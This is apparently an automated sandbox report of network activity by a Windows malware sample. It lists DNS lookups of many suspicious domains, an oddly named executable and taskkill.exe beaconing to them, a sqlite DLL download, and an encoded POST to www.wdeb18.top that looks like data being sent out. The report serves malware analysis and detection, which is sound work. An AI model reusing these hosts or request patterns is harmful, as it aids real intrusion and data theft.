                                                      Sep 19, 2024 15:06:20.150984049 CEST5647553192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:06:20.158191919 CEST53564758.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:06:34.027081966 CEST4938453192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:06:34.144686937 CEST53493848.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:06:47.272377014 CEST5484253192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:06:47.353934050 CEST53548428.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:07:00.895184994 CEST5810553192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:07:00.937077999 CEST53581058.8.8.8192.168.2.22
                                                      Sep 19, 2024 15:07:14.392905951 CEST6492853192.168.2.228.8.8.8
                                                      Sep 19, 2024 15:07:14.430186987 CEST53649288.8.8.8192.168.2.22
                                                      TimestampSource IPDest IPChecksumCodeType
                                                      Sep 19, 2024 15:05:44.516719103 CEST192.168.2.228.8.8.8d00c(Port unreachable)Destination Unreachable
                                                      Sep 19, 2024 15:05:46.720488071 CEST192.168.2.228.8.8.8d00c(Port unreachable)Destination Unreachable
                                                      Sep 19, 2024 15:05:49.613246918 CEST192.168.2.228.8.8.8d00c(Port unreachable)Destination Unreachable
                                                      Sep 19, 2024 15:05:50.630611897 CEST192.168.2.228.8.8.8d00c(Port unreachable)Destination Unreachable
                                                      Sep 19, 2024 15:05:52.808150053 CEST192.168.2.228.8.8.8d00c(Port unreachable)Destination Unreachable
                                                      Sep 19, 2024 15:05:56.556540012 CEST192.168.2.228.8.8.8d00c(Port unreachable)Destination Unreachable
                                                      Sep 19, 2024 15:05:57.797280073 CEST192.168.2.228.8.8.8d00c(Port unreachable)Destination Unreachable
                                                      Sep 19, 2024 15:05:59.701266050 CEST192.168.2.228.8.8.8d00c(Port unreachable)Destination Unreachable
                                                      Sep 19, 2024 15:06:02.576073885 CEST192.168.2.228.8.8.8d00c(Port unreachable)Destination Unreachable
                                                      Sep 19, 2024 15:06:03.597152948 CEST192.168.2.228.8.8.8d00c(Port unreachable)Destination Unreachable
                                                      Sep 19, 2024 15:06:05.603511095 CEST192.168.2.228.8.8.8d00c(Port unreachable)Destination Unreachable
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Sep 19, 2024 15:04:07.419878006 CEST192.168.2.228.8.8.80xcecfStandard query (0)www.tmstore.clickA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:04:13.060216904 CEST192.168.2.228.8.8.80xc0ecStandard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:04:23.595849991 CEST192.168.2.228.8.8.80x1617Standard query (0)www.wdeb18.topA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:04:37.655725956 CEST192.168.2.228.8.8.80x45f9Standard query (0)www.2bhp.comA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:04:50.997200966 CEST192.168.2.228.8.8.80x412cStandard query (0)www.uburn.xyzA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:04.534449100 CEST192.168.2.228.8.8.80x64fcStandard query (0)www.sppsuperplast.onlineA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:18.675501108 CEST192.168.2.228.8.8.80xc588Standard query (0)www.palcoconnector.netA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:37.579474926 CEST192.168.2.228.8.8.80x96e3Standard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:38.586941004 CEST192.168.2.228.8.8.80x96e3Standard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:39.599551916 CEST192.168.2.228.8.8.80x96e3Standard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:41.611331940 CEST192.168.2.228.8.8.80x96e3Standard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:43.595001936 CEST192.168.2.228.8.8.80xca61Standard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:44.606604099 CEST192.168.2.228.8.8.80xca61Standard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:45.620595932 CEST192.168.2.228.8.8.80xca61Standard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:47.633152008 CEST192.168.2.228.8.8.80xca61Standard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:50.537856102 CEST192.168.2.228.8.8.80x30dfStandard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:51.549153090 CEST192.168.2.228.8.8.80x30dfStandard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:52.562613964 CEST192.168.2.228.8.8.80x30dfStandard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:54.574934006 CEST192.168.2.228.8.8.80x30dfStandard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:56.563329935 CEST192.168.2.228.8.8.80x4884Standard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:57.570185900 CEST192.168.2.228.8.8.80x4884Standard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:58.584194899 CEST192.168.2.228.8.8.80x4884Standard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:06:00.596612930 CEST192.168.2.228.8.8.80x4884Standard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:06:06.576175928 CEST192.168.2.228.8.8.80x936eStandard query (0)www.albero-dveri.onlineA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:06:20.150984049 CEST192.168.2.228.8.8.80xb54eStandard query (0)www.tempatmudisini01.clickA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:06:34.027081966 CEST192.168.2.228.8.8.80xdcf5Standard query (0)www.glintra.cyouA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:06:47.272377014 CEST192.168.2.228.8.8.80x796Standard query (0)www.les-massage.onlineA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:07:00.895184994 CEST192.168.2.228.8.8.80xff77Standard query (0)www.030003302.xyzA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:07:14.392905951 CEST192.168.2.228.8.8.80xeef9Standard query (0)www.moritynomxd.xyzA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Sep 19, 2024 15:04:07.601802111 CEST8.8.8.8192.168.2.220xcecfNo error (0)www.tmstore.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                      Sep 19, 2024 15:04:07.601802111 CEST8.8.8.8192.168.2.220xcecfNo error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:04:07.601802111 CEST8.8.8.8192.168.2.220xcecfNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:04:07.601802111 CEST8.8.8.8192.168.2.220xcecfNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:04:13.202552080 CEST8.8.8.8192.168.2.220xc0ecNo error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:04:23.885529041 CEST8.8.8.8192.168.2.220x1617No error (0)www.wdeb18.topwdeb18.topCNAME (Canonical name)IN (0x0001)false
                                                      Sep 19, 2024 15:04:23.885529041 CEST8.8.8.8192.168.2.220x1617No error (0)wdeb18.top206.119.82.147A (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:04:37.684438944 CEST8.8.8.8192.168.2.220x45f9No error (0)www.2bhp.com81.88.63.46A (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:04:51.046675920 CEST8.8.8.8192.168.2.220x412cNo error (0)www.uburn.xyz67.223.117.189A (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:04.541682005 CEST8.8.8.8192.168.2.220x64fcNo error (0)www.sppsuperplast.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                      Sep 19, 2024 15:05:04.541682005 CEST8.8.8.8192.168.2.220x64fcNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                      Sep 19, 2024 15:05:04.541682005 CEST8.8.8.8192.168.2.220x64fcNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:18.789629936 CEST8.8.8.8192.168.2.220xc588No error (0)www.palcoconnector.net208.91.197.27A (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:42.588857889 CEST8.8.8.8192.168.2.220x96e3Server failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:44.516613960 CEST8.8.8.8192.168.2.220x96e3Server failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:44.606461048 CEST8.8.8.8192.168.2.220x96e3Server failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:46.720402002 CEST8.8.8.8192.168.2.220x96e3Server failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:49.530029058 CEST8.8.8.8192.168.2.220xca61Server failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:49.612386942 CEST8.8.8.8192.168.2.220xca61Server failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:50.630521059 CEST8.8.8.8192.168.2.220xca61Server failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:52.808090925 CEST8.8.8.8192.168.2.220xca61Server failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:55.543802977 CEST8.8.8.8192.168.2.220x30dfServer failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:56.556469917 CEST8.8.8.8192.168.2.220x30dfServer failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:57.794363976 CEST8.8.8.8192.168.2.220x30dfServer failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:05:59.700598001 CEST8.8.8.8192.168.2.220x30dfServer failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:06:01.571887016 CEST8.8.8.8192.168.2.220x4884Server failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:06:02.575997114 CEST8.8.8.8192.168.2.220x4884Server failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:06:03.590539932 CEST8.8.8.8192.168.2.220x4884Server failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:06:05.602880001 CEST8.8.8.8192.168.2.220x4884Server failure (2)www.trapkitten.websitenonenoneA (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:06:06.660497904 CEST8.8.8.8192.168.2.220x936eNo error (0)www.albero-dveri.online194.58.112.174A (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:06:20.158191919 CEST8.8.8.8192.168.2.220xb54eNo error (0)www.tempatmudisini01.clicktempatmudisini01.clickCNAME (Canonical name)IN (0x0001)false
                                                      Sep 19, 2024 15:06:20.158191919 CEST8.8.8.8192.168.2.220xb54eNo error (0)tempatmudisini01.click103.21.221.4A (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:06:34.144686937 CEST8.8.8.8192.168.2.220xdcf5No error (0)www.glintra.cyouglintra.cyouCNAME (Canonical name)IN (0x0001)false
                                                      Sep 19, 2024 15:06:34.144686937 CEST8.8.8.8192.168.2.220xdcf5No error (0)glintra.cyou84.32.84.32A (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:06:47.353934050 CEST8.8.8.8192.168.2.220x796No error (0)www.les-massage.online194.58.112.174A (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:07:00.937077999 CEST8.8.8.8192.168.2.220xff77No error (0)www.030003302.xyz030003302.xyzCNAME (Canonical name)IN (0x0001)false
                                                      Sep 19, 2024 15:07:00.937077999 CEST8.8.8.8192.168.2.220xff77No error (0)030003302.xyz65.21.196.90A (IP address)IN (0x0001)false
                                                      Sep 19, 2024 15:07:14.430186987 CEST8.8.8.8192.168.2.220xeef9No error (0)www.moritynomxd.xyz172.81.61.224A (IP address)IN (0x0001)false
                                                      • www.tmstore.click
                                                      • www.sqlite.org
                                                      • www.wdeb18.top
                                                      • www.2bhp.com
                                                      • www.uburn.xyz
                                                      • www.sppsuperplast.online
                                                      • www.palcoconnector.net
                                                      • www.albero-dveri.online
                                                      • www.tempatmudisini01.click
                                                      • www.glintra.cyou
                                                      • www.les-massage.online
                                                      • www.030003302.xyz
                                                      • www.moritynomxd.xyz
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.224916154.179.173.60802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:04:07.635279894 CEST474OUTGET /pk64/?8Xv=VLHph&00yp=D2L+4j8Jfvzl8MUfQ8Vqcg8UJGxjQORTEOKFuX1NYvsOSSQcePjFSCN0IpBPFQyYTcF2sXIJ5SSoTKuZwczHhXNkHd5+/yEpRQ49c6EBn0Awx4E8u0AdyXPE0U9x HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.tmstore.click
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Sep 19, 2024 15:04:08.561336994 CEST504INHTTP/1.1 301 Moved Permanently
                                                      Server: openresty
                                                      Date: Thu, 19 Sep 2024 13:04:08 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://www.tmstore.click/pk64/?8Xv=VLHph&00yp=D2L+4j8Jfvzl8MUfQ8Vqcg8UJGxjQORTEOKFuX1NYvsOSSQcePjFSCN0IpBPFQyYTcF2sXIJ5SSoTKuZwczHhXNkHd5+/yEpRQ49c6EBn0Awx4E8u0AdyXPE0U9x
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.224916245.33.6.223803396C:\Windows\SysWOW64\taskkill.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:04:13.223486900 CEST287OUTGET /2018/sqlite-dll-win32-x86-3230000.zip HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Host: www.sqlite.org
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Sep 19, 2024 15:04:13.755781889 CEST1236INHTTP/1.1 200 OK
                                                      Connection: keep-alive
                                                      Date: Thu, 19 Sep 2024 13:04:13 GMT
                                                      Last-Modified: Tue, 10 Apr 2018 00:29:41 GMT
                                                      Cache-Control: max-age=120
                                                      ETag: "m5acc0575s6e1ef"
                                                      Content-type: application/zip; charset=utf-8
                                                      Content-length: 451055
                                                      Data Raw: 50 4b 03 04 14 00 00 00 08 00 e5 92 82 4c f7 02 c2 ea df 04 00 00 2f 14 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 9e 12 c2 5a 9d 12 c2 5a 75 78 0b 00 01 04 e8 03 00 00 04 64 00 00 00 85 98 cd 92 dc 28 0c 80 ef 79 9b 64 b6 a6 f6 05 72 de 54 76 0f 7b 73 61 2c bb a9 c1 e0 f0 d3 3d 33 4f bf e2 a7 1b 09 dc d9 d3 8c 3e 19 10 42 12 a2 bf ff fb e3 af 9f ff fc fd c5 ff d2 2a c0 cb 24 b6 cd c1 26 02 4c d2 9a 00 ef e1 54 13 0d e1 31 d8 09 3f 04 e3 95 35 0f 3c 0b f9 16 8f 69 55 46 f9 4b 4f 11 86 9e 1d 62 03 3e 73 55 38 d8 05 0e 30 5b af f0 01 8e c6 94 59 a6 59 db 79 24 af 7f 70 b6 d8 38 6b e0 4c d1 75 2b e8 c7 99 a8 35 27 87 70 62 87 00 ae f3 49 a7 44 09 de 9f 29 0d fe ed 74 16 17 07 c7 21 3b 8b 07 f9 fa 3a b2 de ec ab d0 b1 5b e1 13 9c 1d 7d 75 a7 74 02 14 a7 f9 23 80 e7 48 6a eb 81 23 7b 80 e1 c4 81 58 7a 32 7e 75 73 f8 7f 43 d1 7f 4c 17 61 16 4d 1d 90 60 50 3b d8 d8 7c 20 85 91 a0 9f 85 9f c4 39 36 62 b5 d4 20 5c de 26 06 12 c5 74 1f 59 9a ae df 1a b0 5a 8b 80 f3 4e 06 60 81 e5 a9 82 [TRUNCATED]
                                                      Data Ascii: PKL/sqlite3.defUTZZuxd(ydrTv{sa,=3O>B*$&LT1?5<iUFKOb>sU80[YYy$p8kLu+5'pbID)t!;:[}ut#Hj#{Xz2~usCLaM`P;| 96b \&tYZN`nx(s$xP."Y,hH>qX'#xTFxTxfeM qnWiNFD"odvU.Qv(cD=`*ik4&^.5F*eA|9lKM.~fI;f1:)K)\`r[4>[Z|7AhEHmrR_pR6tI0y['#NxI7K P9]GlN1&>.T} L\Kbu=c`,By^G[A{par?q6v^aOd-O[v~N$$0^v)T+-pk=D3"3`=Ha,1F7 $zHzc"k9g'p-2YAz;M9@el~U&qf-Kcke]bXwo)Xacq;`LjytWw8{b%6ntRWT8Eq!x:gK>I-Ny{k57]v
                                                      Sep 19, 2024 15:04:13.755816936 CEST1236INData Raw: 0a c4 d1 95 d3 8e 93 dd 7b 1b 9d 04 ba 24 b9 e0 ba fb b9 88 74 30 7d 46 a6 4a 95 df 1b 9c 0c 1d 41 a6 c3 cc 6e a3 a7 85 b2 92 3b 9d db 69 f5 06 54 36 fc 83 0f b4 65 4f 19 60 ec 03 96 5e b6 b6 9f 78 8e 82 79 1e df 0e 61 b8 76 c3 25 d9 9b df 3c 26
                                                      Data Ascii: {$t0}FJAn;iT6eO`^xyav%<&bm&K\+<6`tjM07Q7/ba$cZO Z~l0c?{wxKS}e*]ea|ma<3a4#3>yTzF&jMX+q
                                                      Sep 19, 2024 15:04:13.755829096 CEST1236INData Raw: fa a0 ca eb 8d 2a cf b9 ce 18 95 72 42 e5 0d 90 93 bd 41 1f 2a 2f 99 8c 17 f6 69 36 7c aa 3a 23 54 be 8f a9 d6 7f 87 20 8b 98 0c fd 4e 6b ce 4b e5 71 73 90 95 a9 56 78 4f 21 8e d4 70 9b dc 6b 93 63 b0 d3 1c 34 59 1f 2b d6 ee 67 5c 75 a1 af 86 c3
                                                      Data Ascii: *rBA*/i6|:#T NkKqsVxO!pkc4Y+g\ucC}49/Yq>dw+*pKdQM9s#kqO`?'f>4m"b=nX-;Gf%`2&QvaAPXTcI{L5
                                                      Sep 19, 2024 15:04:13.755841017 CEST1236INData Raw: 8c b7 b2 4e 3a bf 96 b4 18 25 60 0a a9 1f 49 d0 14 57 5d 55 bb f0 93 ba c1 4e cd 06 5d b3 94 68 6f 30 8a 6c c0 85 19 2b 86 8c 34 60 af 6a 8d ce bb b4 aa 9d 65 13 73 1f 52 16 73 55 75 15 73 e1 5b b8 7c 91 50 cb c1 24 0a b5 41 bd fa 1f b3 ea db b4
                                                      Data Ascii: N:%`IW]UN]ho0l+4`jesRsUus[|P$AdHk~i?\@j#M,[#4K6Bzz%B}D;-)X#K3WU8q'`P;k{8i,RoSmApv>+@o|xcqwfz6OfA#]K
                                                      Sep 19, 2024 15:04:13.755850077 CEST1236INData Raw: 5f 60 8e b2 83 b3 38 6b 6c 0b 33 a6 bc 83 a3 97 55 ce 0b 85 c3 f9 64 54 fb 90 fa fb b8 22 1b 59 6d 5d 1d 59 b4 40 c4 14 5f 1f 70 77 0c 68 2f 02 a5 be cf 61 50 80 4b b7 da 41 2a 80 5f 1b e3 f5 1b 5c 75 88 28 91 29 01 86 4c 5d 07 52 0c 2d b4 c5 98
                                                      Data Ascii: _`8kl3UdT"Ym]Y@_pwh/aPKA*_\u()L]R-j*-WUg5 ARAPrvJ?uw6.o/&5L'mKtl:#i0zQ0fW-qBm1$wsZiS6sPm??P8YfDA 5FpC< qJ
                                                      Sep 19, 2024 15:04:13.755860090 CEST1236INData Raw: 53 01 35 48 29 c1 72 de c4 f0 84 34 13 3a 09 74 dd 24 67 72 bb e2 61 5c ca 17 99 84 9f 34 44 71 02 ca a2 04 ec 86 d4 07 73 1c 47 ef a2 6b 79 18 41 e0 1a 61 3d ce a6 66 b9 c1 ca 75 72 4d 34 f7 0a d7 c7 35 ba fd 7d 65 9a b6 8e 26 40 32 39 46 5a ea
                                                      Data Ascii: S5H)r4:t$gra\4DqsGkyAa=furM45}e&@29FZUg'Nze3qCn+7C;1O0ojW~Rir|$dG(=nldxZ\f*b3Mb|*4<O,@A8Rnd
                                                      Sep 19, 2024 15:04:13.755871058 CEST1025INData Raw: 42 73 0a 42 96 e1 c8 72 23 8d 4a f6 74 5c 73 4b 41 60 b0 21 be 73 fc 88 1b 33 a4 a6 70 d1 b2 52 12 0b 4c 72 29 e5 33 c7 09 36 13 32 4a a9 6d 79 69 55 ab 04 84 ad 16 c5 61 1d 1a 75 c2 ec 83 04 ef a8 26 c7 8e ff 5b 9c a5 2c da a7 d8 aa e9 5c 9a e8
                                                      Data Ascii: BsBr#Jt\sKA`!s3pRLr)362JmyiUau&[,\j%HzNaS&S+-ww|O]rK>rSW`GlwW=F9?b?t"1j`J]{oH6LR!7DWWtuo8jH
                                                      Sep 19, 2024 15:04:13.755881071 CEST1236INData Raw: c6 9b fa db 2a 66 92 85 34 9f 57 56 f1 30 3c 3c 69 d2 de 23 eb 79 58 9e 20 4f f3 4a 31 6f c0 65 df 1a b5 17 c9 16 9e f1 44 cb c6 d5 7d 38 b4 ab 51 0b 81 52 87 15 a4 0e fd 1c 11 c7 dc 16 cc 7c 56 8a c7 45 b0 c2 69 2a ba c5 38 a5 c4 2e 1c 25 cd ae
                                                      Data Ascii: *f4WV0<<i#yX OJ1oeD}8QR|VEi*8.%35:1..d@k^$>ff'yUVZ4J=&RetqiQ,juIz\Mvqh&DC\5V$\K[d:4!8\[+l4N
                                                      Sep 19, 2024 15:04:13.756000996 CEST1236INData Raw: 67 24 07 a6 36 f3 a9 7b b0 5f 07 f4 f4 d8 a5 f2 67 76 ed c8 1a d2 f9 c8 c4 b1 db aa 62 61 ef ea 45 ee ae 80 1d 04 d5 52 b7 e3 41 89 87 f9 8b cd d1 7a 41 ae d1 e9 75 ab 41 87 df f2 32 26 5a a8 b5 57 b6 0b 95 6f 30 a6 92 99 4b d4 7f 62 f5 70 a7 76
                                                      Data Ascii: g$6{_gvbaERAzAuA2&ZWo0Kbpv7o7oO|CaqQ{4])lC)!VGsOlx|gwxw(<]c3h0l="~[&^B2rCoo"zV&n@\m*aZrtXPn\
                                                      Sep 19, 2024 15:04:13.756062984 CEST1236INData Raw: c6 e3 1a 2b 5d 38 90 cf 73 62 3e dd 54 40 cb 97 dd b4 39 ed a6 ed 0b e2 07 a5 af c0 dc 26 0c fc 9d 17 63 82 ff 30 6b 16 b9 95 2f 25 4b 12 e8 12 a0 ca e5 73 e8 66 7e e3 f1 0c cb 2a a0 68 db a7 29 0f 85 2b 5b ab 97 4c 93 40 b0 7a 25 4a af 6a a7 4b
                                                      Data Ascii: +]8sb>T@9&c0k/%Ksf~*h)+[L@z%JjKx"U/E1;IJKIgDRO)z`Nr+P)}|d{B7"4wT)&B,I<5rdqr]{T|f.[JK>R+%Va\R`-%_SNi4
                                                      Sep 19, 2024 15:04:13.762983084 CEST1236INData Raw: 96 fc e1 f9 7b 6c b3 a5 19 b9 f0 bd 0f 00 bd f8 06 70 63 52 1f 89 d5 a6 ba 3b 76 7d 86 29 50 58 7b 7b 4d e4 04 8f 1c 67 3c 72 ad 3d b8 bf fb ed d0 86 39 c2 d3 23 16 6c cf 2f f0 2d 9c fa eb 7d 20 c5 e9 f7 cc 5e 87 a9 d3 9f 9e e3 8c 27 4d 37 1f 0b
                                                      Data Ascii: {lpcR;v})PX{{Mg<r=9#l/-} ^'M7"a%-T,nY,3y$AG<jx1`f=uoEwd9Zz~v)Fj#IOP>u^Fo~l!+Y9=)/xX{


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.2249163206.119.82.147802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:04:23.909493923 CEST2472OUTPOST /66vh/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.wdeb18.top
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 2161
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.wdeb18.top
                                                      Referer: http://www.wdeb18.top/66vh/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 70 5a 46 52 37 58 55 78 4a 2f 63 4b 30 39 36 50 66 46 72 70 78 47 5a 63 69 4f 77 52 46 68 7a 2b 70 72 74 6b 63 46 64 6f 48 72 65 70 4a 44 49 6b 73 4a 6c 47 74 62 69 6f 58 59 74 45 41 4d 39 70 45 37 4f 6c 2f 75 6d 6c 52 76 48 77 46 4f 79 76 56 78 47 73 58 6b 77 37 4d 53 66 54 53 4c 58 59 75 51 68 6e 58 32 64 79 67 56 33 44 4c 74 34 4b 53 76 41 35 67 7a 6d 4c 66 30 58 4b 36 79 6f 47 43 35 76 66 5a 43 63 31 70 61 58 74 57 74 68 61 38 6f 73 57 68 42 32 53 66 36 33 48 34 6c 38 35 58 48 7a 34 39 41 6f 32 57 4e 32 75 42 50 58 76 51 37 6b 75 59 62 48 33 6e 6c 66 6f 65 64 64 4f 2f 74 48 32 6f 75 74 42 6d 62 5a 6e 75 34 59 69 4c 71 69 30 37 76 67 78 4d 56 65 4c 33 69 66 42 73 71 74 6e 52 5a 63 2f 4d 6b 59 5a 75 33 7a 69 57 4c 75 35 44 4b 72 6d 4c 31 78 74 50 4b 4a 4c 31 68 62 7a 4a 61 7a 6d 74 61 77 79 58 4e 54 71 55 6f 36 56 45 32 47 56 70 5a 38 43 37 36 72 39 48 70 54 77 62 54 4f 6f 70 37 4e 72 76 31 66 53 49 42 57 42 75 7a 64 67 38 54 48 64 42 74 52 75 49 39 36 32 4d 2b 4c 66 38 67 73 65 70 [TRUNCATED]
